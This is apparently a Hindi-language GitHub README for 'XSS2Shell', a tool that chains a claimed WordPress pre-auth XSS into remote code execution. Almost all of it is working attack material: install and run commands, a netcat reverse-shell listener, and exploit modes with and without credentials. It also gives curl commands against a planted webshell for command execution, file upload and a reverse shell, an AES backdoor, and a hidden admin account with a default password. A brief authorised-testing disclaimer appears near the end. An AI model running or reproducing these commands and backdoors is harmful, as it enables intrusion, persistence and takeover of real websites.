
WordPress प्री-ऑथ XSS (CVE-2026-64638) का शोषण करके रिमोट कोड निष्पादन प्राप्त करता है, और अधिकृत रेड-टीम अभियानों के लिए पर्सिस्टेंस, फ़ाइल अपलोड, रिवर्स शेल और स्टील्थ विकल्पों सहित AES-एन्क्रिप्टेड बैकडोर वेबशेल स्थापित करता है।
WordPress प्री-ऑथ XSS → RCE चेन एक्सप्लॉइट
G0D150NE द्वारा विकसित
# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell
# Install dependencies
pip3 install requests beautifulsoup4 cryptography
# Run
python3 poc.py -h
# Open terminal for reverse shell
nc -lvnp 4444
ऑटो मोड (अनुशंसित)
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100
XSS मोड (बिना क्रेडेंशियल)
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100
डायरेक्ट मोड (क्रेडेंशियल के साथ)
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100
WebShell इंस्टॉल होने के बाद:
# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)
# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'
# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'
# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5
# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5
# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor
# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass
# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999
सफल एक्सप्लॉइट के बाद:
छिपा हुआ एडमिन बनाया गया:
sysadmin_{slug}{backdoor-pass} (डिफ़ॉल्ट: G0D150NE)╔══════════════════════════════════════════════════════════════════╗
║ Target : http://wordpress-site.com
║ Attacker : 192.168.1.100:4444
║ Plugin : g0d150ne
║ Mode : AUTO
╚══════════════════════════════════════════════════════════════════╝
[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)
╔══════════════════════════════════════════════════════════════════╗
║ [+] EXPLOIT SUCCESSFUL ║
╠══════════════════════════════════════════════════════════════════╣
║ WEBSHELL: ║
║ http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php ║
║ ADMIN USER CREATED: ║
║ Username: sysadmin_g0d150ne ║
║ Password: G0D150NE ║
╚══════════════════════════════════════════════════════════════════╝
केवल शैक्षिक और अधिकृत परीक्षण के लिए।
केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
| विकल्प | विवरण | डिफ़ॉल्ट |
|---|
target | लक्षित WordPress URL | आवश्यक |
-u, --username | WordPress एडमिन उपयोगकर्ता नाम | - |
-p, --wp-pass | WordPress एडमिन पासवर्ड | - |
--lhost | लिसनर IP पता | 127.0.0.1 |
--lport | लिसनर पोर्ट | 4444 |
--mode | एक्सप्लॉइट मोड (auto/xss/direct) | auto |
--slug | प्लगइन स्लग नाम | g0d150ne |
--callback-port | कॉलबैक सर्वर पोर्ट | 9090 |
--backdoor-pass | बैकडोर पासवर्ड | G0D150NE |
| सुविधा | कमांड |
|---|
| कमांड निष्पादित करें | ?b2h=BASE64_CMD |
| फ़ाइल अपलोड करें | -F '[email protected]' |
| रिवर्स शेल | ?rev=1 |
| सादा कमांड | ?cmd=id |
| एन्क्रिप्टेड बैकडोर | ?decrypt=AES_DATA |
| समस्या | समाधान |
|---|
ModuleNotFoundError | pip3 install requests beautifulsoup4 cryptography |
| कनेक्शन अस्वीकृत | लिसनर जांचें: nc -lvnp 4444 |
| लॉगिन विफल | क्रेडेंशियल सत्यापित करें या XSS मोड उपयोग करें |
| प्लगइन अपलोड विफल | अनुमतियां जांचें, अलग स्लग उपयोग करें |
| आर्ग्युमेंट विरोध | wp-pass के लिए -p, बैकडोर के लिए --backdoor-pass उपयोग करें |